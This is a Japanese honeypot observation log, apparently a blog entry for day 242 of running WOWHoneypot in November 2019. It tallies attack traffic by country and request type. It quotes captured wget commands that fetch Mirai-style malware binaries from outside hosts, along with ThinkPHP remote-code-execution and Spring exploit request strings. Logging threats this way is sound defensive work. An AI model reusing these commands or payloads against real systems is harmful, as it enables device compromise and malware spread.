WOWHoneypot観察(242日目)
2019/11/13(水)
トータルは2131件でした。
ハンティングログは以下です。
185.199.26[.]162 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang[.]mpsl |
190.160.39[.]175 wget+hxxp[:]//185.172.110[.]220/mipsel |
190.160.39[.]175 wget+hxxp[:]//185.172.110[.]220/mipsel |
92.253.69[.]156 wget+hxxp[:]//185.172.110[.]220/mipsel |
109.111.76[.]219 wget+hxxp[:]//185.172.110[.]220/mipsel |
176.102.19[.]228 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
ウルグアイ | 2032 |
中国 | 27 |
アメリカ | 17 |
ドイツ | 6 |
香港 | 6 |
ブラジル | 5 |
トルコ | 5 |
オランダ | 3 |
イスラエル | 3 |
フランス | 3 |
スペイン | 3 |
イタリア | 3 |
ロシア | 2 |
インド | 2 |
チリ | 2 |
イラン | 2 |
ヨルダン | 1 |
ポーランド | 1 |
イギリス | 1 |
カナダ | 1 |
チェコ | 1 |
メキシコ | 1 |
ルーマニア | 1 |
ウクライナ | 1 |
パキスタン | 1 |
シンガポール | 1 |
件数 | 概要 | リクエスト |
---|---|---|
2033 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
57 | アクセス | GET / |
6 | POST /tmUnblock.cgi | |
5 | ThinkPHPの脆弱性を狙った通信の検知 | POST /TP/public/index.php?s=captcha |
5 | ThinkPHPの脆弱性を狙った通信の検知 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
5 | ThinkPHPの脆弱性を狙った通信の検知 | GET /TP/public/index.php |
3 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | 不正中継の試み | CONNECT www.google.com:443 |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 通信オプション調査 | OPTIONS / |
1 | 不明 | HEAD /esps/ |
1 | 不正中継の調査 | GET hxxp[:]//www.youdao.com/?0.822676361698160391600 |
1 | 不正中継の調査 | GET hxxp[:]//www.youdao.com/?0.63841300561206216223664 |
1 | 不正中継の調査 | GET hxxp[:]//www.youdao.com/?0.27091673922795762755652 |
1 | 不正中継の調査 | GET hxxp[:]//m.sogou.com/?0.700259859816875421023168 |
1 | 不正中継の調査 | GET hxxp[:]//m.baidu.com/?0.760815349613843802802400 |
1 | 不正中継の調査 | GET hxxp[:]//m.baidu.com/?0.109623943610246051660960 |
1 | 不正中継の調査 | GET hxxp[:]//azenv.net/ |
1 | consulによる調査 | GET /v1/agent/self |
1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
1 | 調査 | GET /script |
1 | 調査 | GET /index.php |
1 | SQL Serverの調査 | GET /admin/connection/ |